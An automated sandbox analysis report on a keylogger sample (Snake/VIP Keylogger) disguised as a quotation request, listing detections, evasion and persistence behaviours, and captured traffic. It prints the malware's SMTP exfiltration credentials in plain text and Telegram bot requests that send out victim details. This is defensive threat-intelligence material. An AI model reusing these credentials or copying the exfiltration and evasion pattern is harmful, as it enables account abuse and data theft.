Windows Analysis Report
Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Overview

General Information

Sample name: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Analysis ID: 1559184
MD5: 7b5985233faf11890e9cf4c7b579983b
SHA1: cb2f20ad79ea7d8a1758ac2ae90a1c6d7f47e784
SHA256: 5cce0ced936e5d9c13d6a4a8a3c149371c92236eb4c465e0e422142946509cea
Tags: exeuser-xzx
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Avira: detection malicious, Label: HEUR/AGEN.1306899
Found malware configuration
Source: 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "transportes@contfly.pt", "Password": "Transportes2022*", "Host": "mail.contfly.pt", "Port": "587", "Version": "4.4"}
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "transportes@contfly.pt", "Password": "Transportes2022*", "Host": "mail.contfly.pt", "Port": "587"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe ReversingLabs: Detection: 34%
Multi AV Scanner detection for submitted file
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe ReversingLabs: Detection: 34%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49720 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49767 version: TLS 1.2
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 06C5B299h 0_2_06C5B736
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0125F45Dh 9_2_0125F2C0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0125F45Dh 9_2_0125F4AC
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0125FC19h 9_2_0125F961
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05979280h 9_2_05978FB0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05977EB5h 9_2_05977B78
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 059718A1h 9_2_059715F8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597C826h 9_2_0597C558
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05970FF1h 9_2_05970D48
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597E816h 9_2_0597E548
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05970741h 9_2_05970498
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05976733h 9_2_05976488
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597BF06h 9_2_0597BC38
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597DEF6h 9_2_0597DC28
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05973709h 9_2_05973460
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597DA66h 9_2_0597D798
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05975A29h 9_2_05975780
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597FA56h 9_2_0597F788
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597BA76h 9_2_0597B7A8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 059779C9h 9_2_05977720
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05972A01h 9_2_05972758
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05972151h 9_2_05971EA8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05975179h 9_2_05974ED0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 059748C9h 9_2_05974620
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05977119h 9_2_05976E70
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597D146h 9_2_0597CE78
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597F136h 9_2_0597EE68
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05971449h 9_2_059711A0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597ECA6h 9_2_0597E9D8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597CCB6h 9_2_0597C9E8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then mov esp, ebp 9_2_0597B081
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597E386h 9_2_0597E0B8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597C396h 9_2_0597C0C8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05970B99h 9_2_059708F0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 059732B1h 9_2_05973008
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 059762D9h 9_2_05976030
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 059702E9h 9_2_05970040
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05972E59h 9_2_05972BB0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05975E81h 9_2_05975BD8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597B5E6h 9_2_0597B318
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 059725A9h 9_2_05972300
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597D5D6h 9_2_0597D308
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 059755D1h 9_2_05975328
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05977571h 9_2_059772C8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 0597F5C6h 9_2_0597F2F8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05976CC1h 9_2_05976A18
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05971CF9h 9_2_05971A50
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 4x nop then jmp 05974D21h 9_2_05974A78
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 069AA4F9h 11_2_069AA996
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 0166F45Dh 14_2_0166F2C0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 0166F45Dh 14_2_0166F52F
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 0166F45Dh 14_2_0166F4AC
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 0166FC19h 14_2_0166F961
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DB0D0Dh 14_2_06DB0B30
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DB1697h 14_2_06DB0B30
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DBFAB9h 14_2_06DBF810
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DB31E0h 14_2_06DB2DC8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DB2C19h 14_2_06DB2968
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DBE959h 14_2_06DBE6B0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DBE501h 14_2_06DBE258
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 14_2_06DB0673
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DBE0A9h 14_2_06DBDE00
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DBF661h 14_2_06DBF3B8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DBF209h 14_2_06DBEF60
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DBEDB1h 14_2_06DBEB08
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DBD3A1h 14_2_06DBD0F8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DBCF49h 14_2_06DBCCA0
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 14_2_06DB0853
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 14_2_06DB0040
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DB31E0h 14_2_06DB2DC3
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DBDC51h 14_2_06DBD9A8
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DBD7F9h 14_2_06DBD550
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 4x nop then jmp 06DB31E0h 14_2_06DB310E

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2015:28:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2014:58:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49712 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49708 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49717 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49724 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49727 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49734 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49722 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49760 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49735 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49745 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49710 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49740 -> 188.114.96.3:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49720 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2015:28:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2014:58:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
